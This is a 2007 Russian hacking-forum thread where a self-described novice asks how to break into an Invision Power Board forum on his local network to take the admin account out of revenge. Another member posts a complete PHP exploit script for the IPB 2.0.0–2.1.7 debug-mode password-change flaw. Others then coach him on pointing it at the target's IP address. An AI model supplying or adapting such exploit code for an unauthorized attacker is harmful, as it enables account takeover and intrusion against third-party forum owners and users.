Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   Атака на Ipb + сниффер (https://forum.antichat.xyz/showthread.php?t=53413)

tick 12.11.2007 13:01

Атака на Ipb + сниффер
 
Здравствуйте!
У меня парочка вопросов...

1. Подскажите сниффер для локалки чтобы взломать IPB!?

2. Есть простой способ взлома IPB?

Я не очень соображаю в хакерстве тут...но хочеться поломать форум или же узнать login и password админа в IPB !

it's my 12.11.2007 13:12

хотя бы версию сказал

tick 12.11.2007 13:15

Цитата:

Сообщение от it's my
хотя бы версию сказал

Русская версия Invision Power Board v2.1.7 © 2007 IPS, Inc. :rolleyes:

И последнию! Но главно взломать ту которую выше указал...помогите народ пожалуйста я в этом деле воще мало что знаю...но отомстить я хочу!

it's my 12.11.2007 13:20

может поможет
PHP код:

<?php
/*

 Debug Mode password change vulnerability
 Affects Invision Power Borard 2.0.0 to 2.1.7
 by Rapigator
 
 This works if:

 "Debug Level" is set to 3
 or
 Enable SQL Debug Mode is turned on
 
 In General Configuration of the forum software.

*/

// The forum's address up to and including 'index.php'
$site "http://localhost/forums/index.php";

// An existing user's login name
$name "admin";

// The new password(3-32 characters)
$pass "1234";

// You can use a proxy...
// $proxy = "1.2.3.4:8080";



// -----------------------------
$site .= "?";
$suffix "";
$name urlencode($name);
$pass urlencode($pass);
$curl curl_init($site.'act=Reg&CODE=10');
curl_setopt($curlCURLOPT_PROXY$proxy);
curl_setopt($curlCURLOPT_RETURNTRANSFER1);
curl_setopt($curlCURLOPT_TIMEOUT10);
$page curl_exec($curl);
curl_close($curl);
if (
preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/'$page$regs)) {
    
$prefix $regs[1];
    
$regid $regs[2];
    
$regcode $regs[3];
} else {
    
$suffix "&debug=1";
    
$curl curl_init($site.'act=Reg&CODE=10'.$suffix);
    
curl_setopt($curlCURLOPT_PROXY$proxy);
    
curl_setopt($curlCURLOPT_RETURNTRANSFER1);
    
curl_setopt($curlCURLOPT_TIMEOUT10);
    
$page curl_exec($curl);
    
curl_close($curl);
    if (
preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/'$page$regs)) {
        
$prefix $regs[1];
        
$regid $regs[2];
        
$regcode $regs[3];
    }
}
if (!isset(
$regid) || !isset($regcode)) {
    echo 
"Error: Probably not vulnerable, or no forum found";
    exit;
}

$curl curl_init($site.$suffix);
curl_setopt($curlCURLOPT_PROXY$proxy);
curl_setopt($curlCURLOPT_RETURNTRANSFER1);
curl_setopt($curlCURLOPT_POST1);
curl_setopt($curlCURLOPT_POSTFIELDS"act=Reg&CODE=11&member_name={$name}&regid={$regid}&reg_code={$regcode}");
curl_setopt($curlCURLOPT_TIMEOUT10);
$page curl_exec($curl);
curl_close($curl);
if (
preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/'$page$regs)) {
    
change_pass($regcode,$regid,$regs[1],$regs[2]);
}
if (
preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/'$page$regs)) {
    
change_pass($regcode,$regid,$regs[1],$regs[2]);
}

function 
change_pass($regcode,$regid,$vid,$userid) {
    global 
$site$proxy$name$pass;
    
$curl curl_init($site.$suffix);
    
curl_setopt($curlCURLOPT_PROXY$proxy);
    
curl_setopt($curlCURLOPT_RETURNTRANSFER1);
    
curl_setopt($curlCURLOPT_POST1);
    
curl_setopt($curlCURLOPT_POSTFIELDS"act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={$vid}&regid={$regid}&reg_code={$regcode}&pass1={$pass}&pass2={$pass}");
    
curl_setopt($curlCURLOPT_TIMEOUT10);
    
$page curl_exec($curl);
    
curl_close($curl);
    echo 
"Password Changed!";
    exit;
}
?>

# milw0rm.com [2006-11-01]


tick 12.11.2007 13:28

хм...как я понял это php файл создать и это туда сунуть? Если так т оя сделал поставил VertrigoServ создал php файл твой код вставил запустил пишет "Error: Probably not vulnerable, or no forum found" что там чтонить менять надо в php в коде или тупо вставить?

(извени за тупость если что не так...спасибо что помогаеш)

AkyHa_MaTaTa 12.11.2007 13:48

Как ты понимаеш варианта два:
либо ты не правильно указываешь адрес форума(он у тебя в локалке стоит, а есть ли у вас Dns сервак, если нету надо указать апи форума и путь), либо форум не "болеет" этим багом, что скорее всего, или не выполнется такое условие на серваке:
This works if:

"Debug Level" is set to 3
or
Enable SQL Debug Mode is turned on

Менять там нужно только прокси, он по дефолту выключен.

tick 12.11.2007 14:12

нету там dns там из ip типо http://192.168.4.24/forum что мне делать?

it's my 12.11.2007 14:22

а форум из инета виден:

tick 12.11.2007 14:41

нет!
Ну подскажите как можно взломать? Народ ну оч. надо просто хз пожалуйста... :(

it's my 12.11.2007 14:47

почитай может пригодиться:
https://forum.antichat.ru/thread15678.html

а еще измени это:
Цитата:

// The forum's address up to and including 'index.php'
$site = "http://localhost/forums/index.php";
на это:
Цитата:

// The forum's address up to and including 'index.php'
$site = "http://192.168.4.24/forum/index.php";


Время: 17:10